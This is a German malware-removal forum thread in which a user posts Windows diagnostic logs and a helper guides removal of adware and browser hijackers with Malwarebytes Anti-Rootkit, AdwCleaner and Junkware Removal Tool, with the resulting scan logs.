FirewallRules: [{F2EF9A12-86E9-472C-A3D4-94A1F9A17C0A}] => (Allow) A:\Program Files (x86)\Origin Games\Battlefield 4\bf4_x86.exe
FirewallRules: [{EAA7D367-AABF-426D-BB3F-EF9A70667017}] => (Allow) A:\Program Files (x86)\Origin Games\Battlefield 4\bf4.exe
FirewallRules: [{98D524D2-5FAB-47A1-8D96-609F4621339A}] => (Allow) A:\Program Files (x86)\Origin Games\Battlefield 4\bf4.exe
FirewallRules: [{54390D52-B160-4427-922D-9E33F5445695}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{5AAA1481-9998-4568-8A9B-D962D4EC35DF}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{AFF1319A-917A-4107-A1B8-16C203B38CE3}] => (Allow) C:\Windows\SysWOW64\PnkBstrA.exe
FirewallRules: [{6E5BD0D9-0928-42F6-B0CC-6822D671F49E}] => (Allow) C:\Windows\SysWOW64\PnkBstrA.exe
FirewallRules: [{4EF4C32F-BB8F-4765-B97F-A9006BD42435}] => (Allow) C:\Windows\SysWOW64\PnkBstrB.exe
FirewallRules: [{6B0C9A6B-F6E7-4A35-9EB7-6D1B664D401A}] => (Allow) C:\Windows\SysWOW64\PnkBstrB.exe
FirewallRules: [{D0D01B7E-5143-44D9-AC6A-CC67DA9DC212}] => (Allow) A:\Program Files (x86)\Origin Games\BFH\BFHWebHelper.exe
FirewallRules: [{F3E54CC2-1149-412B-936A-B7B404D80F42}] => (Allow) A:\Program Files (x86)\Origin Games\BFH\BFHWebHelper.exe
FirewallRules: [TCP Query User{7198F59F-7EF5-4103-881C-0D8F7DF8701B}A:\program files (x86)\origin games\bfh\bfh.exe] => (Allow) A:\program files (x86)\origin games\bfh\bfh.exe
FirewallRules: [UDP Query User{80C05AF5-C686-4759-B28B-9A8FEF736C4C}A:\program files (x86)\origin games\bfh\bfh.exe] => (Allow) A:\program files (x86)\origin games\bfh\bfh.exe
FirewallRules: [{277B4264-74AC-4424-97C4-6D6C0796EF8F}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{29E298B7-7591-4640-AD04-9B5F1E53CBA1}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{E35884C9-26D9-4EAD-9D40-2E56C22777E7}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{085256D1-31AD-4037-8168-D364B01EBC13}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [TCP Query User{B4514ECE-E440-46E1-B1D2-26717681B1E0}C:\program files (x86)\java\jre1.8.0_51\bin\javaw.exe] => (Block) C:\program files (x86)\java\jre1.8.0_51\bin\javaw.exe
FirewallRules: [UDP Query User{6A8D13A6-8290-4176-8559-5F33EC7ED562}C:\program files (x86)\java\jre1.8.0_51\bin\javaw.exe] => (Block) C:\program files (x86)\java\jre1.8.0_51\bin\javaw.exe
FirewallRules: [TCP Query User{821D4B6B-A2AB-4689-9063-D6F980672A77}C:\users\harun\appdata\roaming\spotify\spotify.exe] => (Block) C:\users\harun\appdata\roaming\spotify\spotify.exe
FirewallRules: [UDP Query User{D00ED757-645B-41E0-BFF0-EFEEBB5995ED}C:\users\harun\appdata\roaming\spotify\spotify.exe] => (Block) C:\users\harun\appdata\roaming\spotify\spotify.exe
FirewallRules: [TCP Query User{823DAAEE-6ABF-4B05-BDB9-383B0D21FE83}C:\program files (x86)\java\jre1.8.0_51\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_51\bin\javaw.exe
FirewallRules: [UDP Query User{BB735679-47B3-409A-8738-29CA284AA409}C:\program files (x86)\java\jre1.8.0_51\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_51\bin\javaw.exe
FirewallRules: [TCP Query User{6EE9145F-17C0-43E7-87FF-67A36AF241E7}C:\program files (x86)\minecraft\runtime\jre-x64\1.8.0_25\bin\javaw.exe] => (Allow) C:\program files (x86)\minecraft\runtime\jre-x64\1.8.0_25\bin\javaw.exe
FirewallRules: [UDP Query User{97AB465D-9EFC-47C7-BF64-913694D80FCA}C:\program files (x86)\minecraft\runtime\jre-x64\1.8.0_25\bin\javaw.exe] => (Allow) C:\program files (x86)\minecraft\runtime\jre-x64\1.8.0_25\bin\javaw.exe
FirewallRules: [{19645894-3D5C-4408-A5F6-9B66DFB1DC9F}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{AA0EA854-6DFB-4B81-8D5C-1056DC11E33C}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{1FB21FF6-AB11-484B-8ADB-638F34153E99}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{48F1500B-0F5A-488B-A6C2-4E310ADB9290}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{E2B24A02-1023-4742-AADB-DAF1650CE7CA}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [{2DB1B594-3330-4CBE-9C2C-A9AE295E4933}] => (Allow) C:\Program Files (x86)\eAHPeNhIUJ\eAHPeNhIUJ\chrome.exe
FirewallRules: [{3C2F26B4-E13F-4E26-B187-60BDB19D986F}] => (Allow) C:\Program Files (x86)\Raptr Inc\PlaysTV\playstv.exe
FirewallRules: [{16CB5095-C60B-4A9A-AF40-FFF4FF667E4A}] => (Allow) C:\Program Files (x86)\Raptr Inc\PlaysTV\playstv.exe
FirewallRules: [{302047B4-E0E7-4AE6-96B2-BDD4D5C4307D}] => (Allow) A:\iTunes.exe

==================== Wiederherstellungspunkte =========================

ACHTUNG: Systemwiederherstellung ist deaktiviert

==================== Fehlerhafte Geräte im Gerätemanager =============


==================== Fehlereinträge in der Ereignisanzeige: =========================

Applikationsfehler:
==================
Error: (04/16/2016 06:13:41 PM) (Source: Perflib) (EventID: 1023) (User: )
Description: rdyboost4

Error: (04/16/2016 06:13:41 PM) (Source: Perflib) (EventID: 1008) (User: )
Description: BITSC:\Windows\System32\bitsperf.dll4

Error: (04/16/2016 10:01:24 AM) (Source: Application Hang) (EventID: 1002) (User: )
Description: Programm SndVol.exe, Version 10.0.10240.16384 kann nicht mehr unter Windows ausgeführt werden und wurde beendet. Überprüfen Sie den Problemverlauf in der Systemsteuerung "Sicherheit und Wartung", um nach weiteren Informationen zum Problem zu suchen.

Prozess-ID: 1b34

Startzeit: 01d197b0a249f565

Beendigungszeit: 2

Anwendungspfad: C:\Windows\System32\SndVol.exe

Berichts-ID: 676b8fbe-03a9-11e6-9c27-bcaec571bf31

Vollständiger Name des fehlerhaften Pakets:

Auf das fehlerhafte Paket bezogene Anwendungs-ID:

Error: (04/12/2016 03:18:06 PM) (Source: ESENT) (EventID: 413) (User: )
Description: SettingSyncHost (3472) Es konnte keine neue Protokolldatei erstellt werden, weil die Datenbank nicht auf das Protokolllaufwerk schreiben kann. Das Laufwerk ist möglicherweise schreibgeschützt, falsch konfiguriert, beschädigt oder hat zu wenig freien Speicherplatz. Fehler -1032.

Error: (04/12/2016 03:18:06 PM) (Source: ESENT) (EventID: 488) (User: )
Description: SettingSyncHost (3472) Der Versuch, die Datei "C:\WINDOWS\system32\edbtmp.log" zu erstellen, ist mit Systemfehler 5 (0x00000005): "Zugriff verweigert " fehlgeschlagen. Fehler -1032 (0xfffffbf8) beim Erstellen von Dateien.

Error: (04/12/2016 03:17:55 PM) (Source: ESENT) (EventID: 413) (User: )
Description: SettingSyncHost (3472) Es konnte keine neue Protokolldatei erstellt werden, weil die Datenbank nicht auf das Protokolllaufwerk schreiben kann. Das Laufwerk ist möglicherweise schreibgeschützt, falsch konfiguriert, beschädigt oder hat zu wenig freien Speicherplatz. Fehler -1032.

Error: (04/12/2016 03:17:55 PM) (Source: ESENT) (EventID: 488) (User: )
Description: SettingSyncHost (3472) Der Versuch, die Datei "C:\WINDOWS\system32\edbtmp.log" zu erstellen, ist mit Systemfehler 5 (0x00000005): "Zugriff verweigert " fehlgeschlagen. Fehler -1032 (0xfffffbf8) beim Erstellen von Dateien.

Error: (04/12/2016 03:17:45 PM) (Source: ESENT) (EventID: 413) (User: )
Description: SettingSyncHost (3472) Es konnte keine neue Protokolldatei erstellt werden, weil die Datenbank nicht auf das Protokolllaufwerk schreiben kann. Das Laufwerk ist möglicherweise schreibgeschützt, falsch konfiguriert, beschädigt oder hat zu wenig freien Speicherplatz. Fehler -1032.

Error: (04/12/2016 03:17:45 PM) (Source: ESENT) (EventID: 488) (User: )
Description: SettingSyncHost (3472) Der Versuch, die Datei "C:\WINDOWS\system32\edbtmp.log" zu erstellen, ist mit Systemfehler 5 (0x00000005): "Zugriff verweigert " fehlgeschlagen. Fehler -1032 (0xfffffbf8) beim Erstellen von Dateien.

Error: (04/12/2016 03:17:35 PM) (Source: ESENT) (EventID: 413) (User: )
Description: SettingSyncHost (3472) Es konnte keine neue Protokolldatei erstellt werden, weil die Datenbank nicht auf das Protokolllaufwerk schreiben kann. Das Laufwerk ist möglicherweise schreibgeschützt, falsch konfiguriert, beschädigt oder hat zu wenig freien Speicherplatz. Fehler -1032.


Systemfehler:
=============
Error: (04/19/2016 12:51:53 PM) (Source: Service Control Manager) (EventID: 7024) (User: )
Description: Der Dienst "Xbox Live Authentifizierungs-Manager" wurde mit dem folgenden dienstspezifischen Fehler beendet:
%%0

Error: (04/19/2016 12:45:49 PM) (Source: DCOM) (EventID: 10016) (User: NT-AUTORITÄT)
Description: AnwendungsspezifischLokalAktivierung{D63B10C5-BB46-4990-A94F-E40B9D520160}{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}NT-AUTORITÄTLokaler DienstS-1-5-19LocalHost (unter Verwendung von LRPC)Nicht verfügbarNicht verfügbar

Error: (04/19/2016 12:43:47 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Der Dienst "Windows Search" wurde aufgrund folgenden Fehlers nicht gestartet:
%%1069

Error: (04/19/2016 12:43:47 PM) (Source: Service Control Manager) (EventID: 7038) (User: )
Description: Der Dienst "WSearch" konnte sich nicht als "NT AUTHORITY\SYSTEM" mit dem aktuellen Kennwort aufgrund des folgenden Fehlers anmelden:
%%50

Vergewissern Sie sich, dass der Dienst richtig konfiguriert ist im Dienste-Snap-In in der Microsoft Management Console (MMC).

Error: (04/19/2016 12:43:44 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Der Dienst "Benutzerdatenzugriff_Session3" wurde unerwartet beendet. Dies ist bereits 1 Mal vorgekommen. Folgende Korrekturmaßnahmen werden in 10000 Millisekunden durchgeführt: Neustart des Diensts.

Error: (04/19/2016 12:43:44 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Der Dienst "Benutzerdatenspeicher _Session3" wurde unerwartet beendet. Dies ist bereits 1 Mal vorgekommen. Folgende Korrekturmaßnahmen werden in 10000 Millisekunden durchgeführt: Neustart des Diensts.

Error: (04/19/2016 12:43:44 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Der Dienst "Kontaktdaten_Session3" wurde unerwartet beendet. Dies ist bereits 1 Mal vorgekommen. Folgende Korrekturmaßnahmen werden in 10000 Millisekunden durchgeführt: Neustart des Diensts.

Error: (04/19/2016 12:43:44 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Der Dienst "Synchronisierungshost_Session3" wurde unerwartet beendet. Dies ist bereits 1 Mal vorgekommen. Folgende Korrekturmaßnahmen werden in 10000 Millisekunden durchgeführt: Neustart des Diensts.

Error: (04/19/2016 12:43:19 PM) (Source: Service Control Manager) (EventID: 7006) (User: )
Description: Der Aufruf "ScRegSetValueExW" ist für "DeleteFlag" aufgrund folgenden Fehlers fehlgeschlagen:
%%5

Error: (04/19/2016 12:43:19 PM) (Source: Service Control Manager) (EventID: 7006) (User: )
Description: Der Aufruf "ScRegSetValueExW" ist für "Security" aufgrund folgenden Fehlers fehlgeschlagen:
%%5


CodeIntegrity:
===================================
  Date: 2016-04-10 17:34:51.713
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

  Date: 2016-04-10 17:34:51.604
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

  Date: 2016-04-10 17:34:51.343
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

  Date: 2016-04-10 17:34:51.268
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

  Date: 2016-04-10 17:34:50.485
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

  Date: 2016-04-10 17:34:50.414
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

  Date: 2016-04-10 17:34:49.980
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

  Date: 2016-04-10 17:34:49.908
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

  Date: 2016-04-10 17:34:49.114
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

  Date: 2016-04-10 17:34:49.045
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.


==================== Speicherinformationen ===========================

Prozessor: Intel(R) Core(TM) i7-2600K CPU @ 3.40GHz
Prozentuale Nutzung des RAM: 27%
Installierter physikalischer RAM: 8173.24 MB
Verfügbarer physikalischer RAM: 5966.08 MB
Summe virtueller Speicher: 16877.24 MB
Verfügbarer virtueller Speicher: 14444.86 MB

==================== Laufwerke ================================

Drive a: (Harun) (Fixed) (Total:931.51 GB) (Free:774.42 GB) NTFS
Drive c: (Windows) (Fixed) (Total:59.09 GB) (Free:12.32 GB) NTFS

==================== MBR & Partitionstabelle ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 59.6 GB) (Disk ID: D9E74E88)
Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=59.1 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=450 MB) - (Type=27)

========================================================
Disk: 1 (MBR Code: Windows 7 or 8) (Size: 931.5 GB) (Disk ID: 4D282A8D)
Partition 1: (Not Active) - (Size=931.5 GB) - (Type=07 NTFS)

==================== Ende von Addition.txt ============================
Hoffe diesmal ist es richtig :D

cosinus 19.04.2016 13:32
Bitte Avira deinstallieren (und auch noch alle Reste von AVG). Das Teil empfehlen wir schon seit Jahren aus mehreren Gründen nicht mehr. Ein Grund ist ne rel. hohe Fehlalarmquote, der zweite Hauptgrund ist, dass die immer noch mit ASK zusammenarbeiten (Avira Suchfunktion geht über ASK). Auch andere Freewareanbieter wie AVG, Avast oder Panda sprangen auf diesen Zug auf; so was ist bei Sicherheitssoftware einfach inakzeptabel. Vgl. Antivirensoftware: Schutz Für Ihre Dateien, Aber Auf Kosten Ihrer Privatsphäre? | Emsisoft Blog

Gib Bescheid wenn Avira weg ist; wenn wir hier durch sind, kannst du auf einen anderen Virenscanner umsteigen, Infos folgen dann im Abschlussposting. Bitte JETZT nix mehr ohne Absprache installieren!

StOony 19.04.2016 13:37
Also soll ich jetzt erstmal Avira nur Deinstallieren ? Oder auch dieses Emsisoft nach der Deinstallation Installieren ? Dein Satz Bitte nichts mehr ohne Absprache hat mich irritiert, ist das jetzt ne Absprache gewesen ? :D

EDIT: Avira ist komplett aus dem Systeme

cosinus 19.04.2016 14:29
Malwarebytes Anti-Rootkit (MBAR)

Downloade dir bitte Malwarebytes Anti-Rootkit Malwarebytes Anti-Rootkit und speichere es auf deinem Desktop.
  • Starte bitte die mbar.exe.
  • Folge den Anweisungen auf deinem Bildschirm gemäß Anleitung zu Malwarebytes Anti-Rootkit
  • Aktualisiere unbedingt die Datenbank und erlaube dem Tool, dein System zu scannen.
  • Klicke auf den CleanUp Button und erlaube den Neustart.
  • Während dem Neustart wird MBAR die gefundenen Objekte entfernen, also bleib geduldig.
  • Nach dem Neustart starte die mbar.exe erneut.
  • Sollte nochmal was gefunden werden, wiederhole den CleanUp Prozess.
Das Tool wird im erstellten Ordner eine Logfile ( mbar-log-<Jahr-Monat-Tag>.txt ) erzeugen. Bitte poste diese hier.

Starte keine andere Datei in diesem Ordner ohne Anweisung eines Helfers



Lesestoff:
Posten in CODE-Tags
Die Logfiles anzuhängen oder sogar vorher in ein ZIP, RAR oder 7Z-Archiv zu packen erschwert mir massiv die Arbeit.
Auch wenn die Logs für einen Beitrag zu groß sein sollten, bitte ich dich die Logs direkt und notfalls über mehrere Beiträge verteilt zu posten.
Um die Logfiles in eine CODE-Box zu stellen gehe so vor:
  • Markiere das gesamte Logfile (geht meist mit STRG+A) und kopiere es in die Zwischenablage mit STRG+C.
  • Klicke im Editor auf das #-Symbol. Es erscheinen zwei Klammerausdrücke [CODE] [/CODE].
  • Setze den Curser zwischen die CODE-Tags und drücke STRG+V.
  • Klicke auf Erweitert/Vorschau, um so prüfen, ob du es richtig gemacht hast. Wenn alles stimmt ... auf Antworten.
http://www.trojaner-board.de/picture...&pictureid=307

StOony 19.04.2016 14:57
So bin deinen Anweisungen Treu gewesen, nur hab ich nicht nur eine mbar-log Datei, ich werde mal alle hier hin posten.

mbar-log-2016-04-19 (15-33-19):

Code:
Malwarebytes Anti-Rootkit BETA 1.9.3.1001
www.malwarebytes.org

Database version:
  main:    v2016.04.19.04
  rootkit: v2016.04.17.01

Windows 10 x64 NTFS
Internet Explorer 11.0.10240.16766
Harun :: HARUN-PC [administrator]

19.04.2016 15:33:19
mbar-log-2016-04-19 (15-33-19).txt

Scan type: Quick scan
Scan options enabled: Anti-Rootkit | Drivers | MBR | Physical Sectors | Memory | Startup | Registry | File System | Heuristics/Extra | Heuristics/Shuriken
Scan options disabled:
Objects scanned: 13
Time elapsed: 19 second(s) [aborted]

Memory Processes Detected: 0
(No malicious items detected)

Memory Modules Detected: 0
(No malicious items detected)

Registry Keys Detected: 0
(No malicious items detected)

Registry Values Detected: 0
(No malicious items detected)

Registry Data Items Detected: 0
(No malicious items detected)

Folders Detected: 0
(No malicious items detected)

Files Detected: 1
C:\WINDOWS\SYSTEM32\drivers\MPCKpt.sys (PUP.Optional.MorePowerfulCleaner) -> No action taken. [86b15ecd04e175d101d2b0fad78b202a]

Physical Sectors Detected: 0
(No malicious items detected)

(end)
mbar-log-2016-04-19 (15-33-59):

Code:
Malwarebytes Anti-Rootkit BETA 1.9.3.1001
www.malwarebytes.org

Database version:
  main:    v2016.04.19.04
  rootkit: v2016.04.17.01

Windows 10 x64 NTFS
Internet Explorer 11.0.10240.16766
Harun :: HARUN-PC [administrator]

19.04.2016 15:33:59
mbar-log-2016-04-19 (15-33-59).txt

Scan type: Quick scan
Scan options enabled: Anti-Rootkit | Drivers | MBR | Physical Sectors | Memory | Startup | Registry | File System | Heuristics/Extra | Heuristics/Shuriken
Scan options disabled:
Objects scanned: 473508
Time elapsed: 9 minute(s), 21 second(s)

Memory Processes Detected: 0
(No malicious items detected)

Memory Modules Detected: 0
(No malicious items detected)

Registry Keys Detected: 0
(No malicious items detected)

Registry Values Detected: 0
(No malicious items detected)

Registry Data Items Detected: 0
(No malicious items detected)

Folders Detected: 0
(No malicious items detected)

Files Detected: 1
C:\WINDOWS\SYSTEM32\drivers\MPCKpt.sys (PUP.Optional.MorePowerfulCleaner) -> Delete on reboot. [86b15ecd04e175d101d2b0fad78b202a]

Physical Sectors Detected: 0
(No malicious items detected)

(end)
mbar-log-2016-04-19 (15-47-22):

Code:
Malwarebytes Anti-Rootkit BETA 1.9.3.1001
www.malwarebytes.org

Database version:
  main:    v2016.04.19.04
  rootkit: v2016.04.17.01

Windows 10 x64 NTFS
Internet Explorer 11.0.10240.16766
Harun :: HARUN-PC [administrator]

19.04.2016 15:47:22
mbar-log-2016-04-19 (15-47-22).txt

Scan type: Quick scan
Scan options enabled: Anti-Rootkit | Drivers | MBR | Physical Sectors | Memory | Startup | Registry | File System | Heuristics/Extra | Heuristics/Shuriken
Scan options disabled:
Objects scanned: 472746
Time elapsed: 8 minute(s), 39 second(s)

Memory Processes Detected: 0
(No malicious items detected)

Memory Modules Detected: 0
(No malicious items detected)

Registry Keys Detected: 0
(No malicious items detected)

Registry Values Detected: 0
(No malicious items detected)

Registry Data Items Detected: 0
(No malicious items detected)

Folders Detected: 0
(No malicious items detected)

Files Detected: 0
(No malicious items detected)

Physical Sectors Detected: 0
(No malicious items detected)

(end)
Bittesehr

cosinus 19.04.2016 15:00
Adware/Junkware/Toolbars entfernen

Alte Versionen von adwCleaner und falls vorhanden JRT vorher löschen, danach neu runterladen auf den Desktop!
Virenscanner jetzt vor dem Einsatz dieser Tools bitte komplett deaktivieren!

1. Schritt: adwCleaner

Downloade Dir bitte AdwCleaner Logo Icon AdwCleaner auf deinen Desktop.
  • Schließe alle offenen Programme und Browser. Bebilderte Anleitung zu AdwCleaner.
  • Starte die AdwCleaner.exe mit einem Doppelklick.
  • Stimme den Nutzungsbedingungen zu.
  • Klicke auf Optionen und vergewissere dich, dass die folgenden Punkte ausgewählt sind:
    • "Tracing" Schlüssel löschen
    • Winsock Einstellungen zurücksetzen
    • Proxy Einstellungen zurücksetzen
    • Internet Explorer Richtlinien zurücksetzen
    • Chrome Richtlinien zurücksetzen
    • Stelle sicher, dass alle 5 Optionen wie hier dargestellt, ausgewählt sind
  • Klicke auf Suchlauf und warte bis dieser abgeschlossen ist.
  • Klicke nun auf Löschen und bestätige auftretende Hinweise mit Ok.
  • Dein Rechner wird automatisch neu gestartet. Nach dem Neustart öffnet sich eine Textdatei. Poste mir deren Inhalt mit deiner nächsten Antwort.
  • Die Logdatei findest du auch unter C:\AdwCleaner\AdwCleaner[Cx].txt. (x = fortlaufende Nummer).




2. Schritt: JRT - Junkware Removal Tool

Beende bitte Deine Schutzsoftware um eventuelle Konflikte zu vermeiden.
Bitte lade Junkware Removal Tool auf Deinen Desktop

  • Starte das Tool mit Doppelklick. Ab Windows Vista (oder höher) bitte mit Rechtsklick "als Administrator ausführen" starten.
  • Drücke eine beliebige Taste, um das Tool zu starten.
  • Je nach System kann der Scan eine Weile dauern.
  • Wenn das Tool fertig ist wird das Logfile (JRT.txt) auf dem Desktop gespeichert und automatisch geöffnet.
  • Bitte poste den Inhalt der JRT.txt in Deiner nächsten Antwort.


StOony 19.04.2016 15:17
AdwCleaner:

Code:
# AdwCleaner v5.112 - Bericht erstellt am 19/04/2016 um 16:11:02
# Aktualisiert am 17/04/2016 von Xplode
# Datenbank : 2016-04-19.4 [Server]
# Betriebssystem : Windows 10 Pro  (X64)
# Benutzername : Harun - HARUN-PC
# Gestartet von : C:\Users\Harun\Downloads\AdwCleaner_5.112 (1).exe
# Option : Löschen
# Unterstützung : hxxp://toolslib.net/forum

***** [ Dienste ] *****

[-] Dienst gelöscht : MPCProtectService

***** [ Ordner ] *****

[-] Ordner gelöscht : C:\ProgramData\Microsoft\Windows\Start Menu\Programs\MPC
[-] Ordner gelöscht : C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\extensions\deskCutv2@gmail.com

***** [ Dateien ] *****

[-] Datei gelöscht : C:\WINDOWS\SysNative\drivers\MPCKpt.sys

***** [ DLLs ] *****


***** [ Verknüpfungen ] *****


***** [ Aufgabenplanung ] *****


***** [ Registrierungsdatenbank ] *****

[-] Schlüssel gelöscht : HKLM\SOFTWARE\MPC

***** [ Internetbrowser ] *****

[-] [C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\prefs.js] gelöscht : user_pref("browser.newtab.url", "hxxp://www.yoursearching.com/newtab/?type=nt&ts=1457449062&z=c0daee2b39051a59099a9edgcz9wcm9z2z6t7eaqeo&from=face&uid=SAMSUNGXSSDX830XSeries_S0XXNEAC500477");
[-] [C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\prefs.js] gelöscht : user_pref("browser.search.defaultenginename", "yessearches");
[-] [C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\prefs.js] gelöscht : user_pref("browser.search.searchengine.hp", "hxxp://www.yessearches.com/?ts=AHEpBnEoBn0qB0..&v=20160301&uid=0AD0C687FD476CAE2DF5F47FFC66340E&ptid=wak&mode=ffsengext");
[-] [C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\prefs.js] gelöscht : user_pref("browser.search.searchengine.sp", "hxxp://www.yessearches.com/chrome.php?mode=ffsengext&ptid=wak&q={searchTerms}&ts=AHEpBnEoBn0qB0..&uid=0AD0C687FD476CAE2DF5F47FFC66340E&v=20160301");
[-] [C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\prefs.js] gelöscht : user_pref("browser.search.searchengine.url", "hxxp://www.yessearches.com/chrome.php?mode=ffsengext&ptid=wak&q={searchTerms}&ts=AHEpBnEoBn0qB0..&uid=0AD0C687FD476CAE2DF5F47FFC66340E&v=20160301");
[-] [C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\prefs.js] gelöscht : user_pref("browser.search.selectedEngine", "yessearches");
[-] [C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\prefs.js] gelöscht : user_pref("browser.startup.homepage", "search.mpc.am");

*************************

:: "Tracing" Schlüssel gelöscht
:: Proxy Einstellungen zurückgesetzt
:: Winsock Einstellungen zurückgesetzt
:: Internet Explorer Richtlinien gelöscht
:: Chrome Richtlinien gelöscht

*************************

C:\AdwCleaner\AdwCleaner[C1].txt - [11273 Bytes] - [19/04/2016 12:43:19]
C:\AdwCleaner\AdwCleaner[C2].txt - [2913 Bytes] - [19/04/2016 16:11:02]
C:\AdwCleaner\AdwCleaner[S1].txt - [11464 Bytes] - [19/04/2016 12:41:05]
C:\AdwCleaner\AdwCleaner[S3].txt - [2855 Bytes] - [19/04/2016 16:08:56]

########## EOF - C:\AdwCleaner\AdwCleaner[C2].txt - [3133 Bytes] ##########
JRT:

Code:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Junkware Removal Tool (JRT) by Malwarebytes
Version: 8.0.4 (03.14.2016)
Operating System: Windows 10 Pro x64
Ran by Harun (Administrator) on 19.04.2016 at 16:13:33,01
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~




File System: 14

Successfully deleted: C:\ProgramData\28341ff220e0446c9fff27c4493d622e (Folder)
Successfully deleted: C:\Users\Harun\AppData\Local\crashrpt (Folder)
Successfully deleted: C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\extensions\@E9438230-A7DF-4D1F-8F2D-CA1D0F0F7924.xpi (File)
Successfully deleted: C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\extensions\bingsearch.full@microsoft.com\search.xml (File)
Successfully deleted: C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\user.js (File)
Successfully deleted: C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\Biuc7STG.default\extensions\bingsearch.full@microsoft.com\search.xml (File)
Successfully deleted: C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\Biuc7STG.default\user.js (File)
Successfully deleted: C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\@E9438230-A7DF-4D1F-8F2D-CA1D0F0F7924.xpi (File)
Successfully deleted: C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\bingsearch.full@microsoft.com\search.xml (File)
Successfully deleted: C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\extensions\staged (Folder)
